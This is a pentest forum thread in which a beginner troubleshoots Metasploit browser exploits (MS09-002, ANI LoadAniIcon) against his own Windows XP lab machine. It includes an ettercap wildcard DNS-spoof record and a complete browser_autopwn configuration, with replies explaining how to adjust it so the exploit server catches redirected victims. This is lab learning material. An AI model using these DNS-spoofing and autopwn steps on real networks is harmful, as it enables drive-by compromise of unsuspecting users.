I've started my first pentest Lab successfuly and thanks to all friends here that helped me alot to do that and i started my first pentest process

i tried to exploit my windows xp sp3 machine with the MS09_002_memory_corruption exploit with BackTrack 4

and when the target tried to open the browser IE6 not IE7 i got this at the Metasploit shell :

Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.2:1074 ...


is that because im using IE6 not IE7 i thought i can use this exploit at both of them !!

??


and one more thing what exploit was i talking about in this video :

http://www.youtube.com/watch?v=lhIk5Cix3DU

that guy demonstrated way to force the victim to go to his exploit server that he made with metasploit

and i tried ti this since its aweosme way to not send the victim any link or anything to ur server

i tried to do this with ettercap i edited the etter.dns and :

added the A record as the following

*            A    192.168.1.4

and then used the exploit in metasploit

the problem is when i used this exploit and if i didn't configure the options "URIPATH" it takes random path that i have to send to victim

so the new path will be for example http://192.168.1.4/gegwsgf

and the ettercap will redirect the traffic to 192.168.1.4 only without /gegwsgf

and when i tried it the victim spoofed successfuly to my ip 192.168.1.4 but no connection established at the metasploit :S why ?

that guy on the video didn't type URIPATH and didn't get random path like i did 192.168.1.4 only without the 192.168.1.4:80/fedfwgvsw

why ?

yes i always using msfconsole

yes i tried ur way and it worked with dns spoof and forced my xp once i opened the IE7 to make the exploit work but didn't get any session

because i think as u said this exploit working at IE7 only

do u know any working IE6 exploit i can use ?

i searched on the aurora one in my metasploit at backtrack 4

but didn't find this 1

FYI - I thought this would be a good question for the community so I posed a new topic for exploit listings by product. 

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5570.0/

can u please tell me when i use this ?

after i dns_spoofed the target with ettercap and tried to get session with metasploit but didn't yet do u mean after i tried both of them i use this ??

or just after ettercap ??

because u said it trying to get vulnerability of brwoser that trying to connect to you

can you please gimme more details and steps ?



and btw i tried this exploit ani_loadimage_chunksize its working for both IE6 and IE7 but didn't work with me same its final step before the

• Sending stage (723456 bytes)

and it stopped

here's what i got :

msf exploit(ani_loadimage_chunksize) >

• Attempting to exploit ani_loadimage_chunksize
• Sending HTML page to 192.168.1.2:1130...
• Attempting to exploit ani_loadimage_chunksize
• Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.2:1130...[/color][/b]
  
  and thats all never get session
  
  
  i need u to tell me the auxiliary/server/browser_autopwn usage so i can try

As for the browser_autopwn, it is a replacement to the exploit you use.  Basically AUTOPWN will AUTOMATICALLY PWN the target.  It does this by starting a whole bunch of exploits at once and then when the target browser navigates to the URI, it will exploit it one at a time until it gets a session.



(From offensive-security website...)

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST <ipaddress>
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST <ipaddress>
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



This will load a bunch of modules, then the target goes to "http://<ipaddress>:55550/ads" and the magic happens!

i found no steps i can do at this thread

Change AUTOPWN_PORT to 80, AUTOPWN_URI to /, SRVPORT to 80 and URIPATH to / and you should get what you want.  I just pulled that code straight from the OS website and it worked for me in BT4.